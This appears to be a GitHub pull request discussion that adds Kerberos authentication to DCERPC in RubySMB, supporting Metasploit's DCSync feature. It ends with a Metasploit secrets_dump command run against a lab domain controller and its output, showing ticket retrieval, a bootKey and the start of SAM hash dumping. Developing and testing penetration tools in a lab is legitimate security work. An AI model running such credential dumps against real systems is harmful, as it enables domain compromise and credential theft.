Enable Kerberos auth for DCERPC

[smashery]

This PR supports the kerberos-in-DCSync work in the Metasploit repo (see: rapid7/metasploit-framework#18419). Test cases are listed in that PR, and should exercise all of the changes in this PR.

[cdelafuente-r7]

Thanks @smashery for updating the library! This is a great thing to add support to Kerberos authentication in MSF, awesome work! My only regret is that it is not implemented in RubySMB itself. That would have been even better and many RubySMB users would have benefit from this. But I understand the limitations and all the Kerberos dependencies to MSF.

That being said, I left a few comments for you to review when you get a chance. One main issue I saw during testing was the signature validation. Please, let me know if you have any questions.

[smashery]

Thanks for the review @cdelefuente-r7. Agreed regarding having the Kerberos functionality available here. I wonder whether it would be worth a refactoring job to pull it out into either here, or a separate repo?
I think I've addressed the comments - let me know if there's anything else needed.

[cdelafuente-r7]

Thanks for updating this @smashery! Everything looks good to me know. I retested and confirmed the signature verification issue is fixed now.
Adding Kerberos functionality would be great, but it would require a lot of refactoring and changes. I think your solution is the best for now. That being said, I keep this idea in mind for a future enhancement.

[cdelafuente-r7]

Sorry for the last minute comment before it lands. I just noticed a few comments from last week were not answered yet. Also, I added one more about the padding length calculation logic in the request.

[cdelafuente-r7]

I think I missed this one. Do you think we could use the original implementation here too?

Suggested change

	string :auth_pad, onlyif: -> { has_auth_verifier? }
	string :auth_pad,
	onlyif: -> { has_auth_verifier? },
	length: -> { calculate_padding_size }

[smcintyre-r7]

@cdelafuente-r7 I opened a PR implemented the changes you requested here smashery#1. Give it a look and let me know what you think

[smcintyre-r7]

Tested this with the Metasploit side of things and it's all looking good to me now!

Thanks for your work on this Smashery, this is a great improvement!

msf6 auxiliary(gather/windows_secrets_dump) > run DOMAIN=msflab.local SMB::Auth=kerberos SMB::Rhostname=dc.msflab.local DomainControllerRhost=192.168.159.10
[*] Running module against 192.168.159.10

[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20231025135757_default_192.168.159.10_mit.kerberos.cca_191490.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20231025135757_default_192.168.159.10_mit.kerberos.cca_964676.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid delegation TGS-Response
[*] 192.168.159.10:445 - Service RemoteRegistry is already running
[*] 192.168.159.10:445 - Retrieving target system bootKey
[+] 192.168.159.10:445 - bootKey: 0x369c37bc5ec5e4b3eaeee7b69caf5d6a
[*] 192.168.159.10:445 - Saving remote SAM database
[*] 192.168.159.10:445 - Dumping SAM hashes
[*] 192.168.159.10:445 - Password hints:
No users with password hints on this system
[*] 192.168.159.10:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
... cut because secrets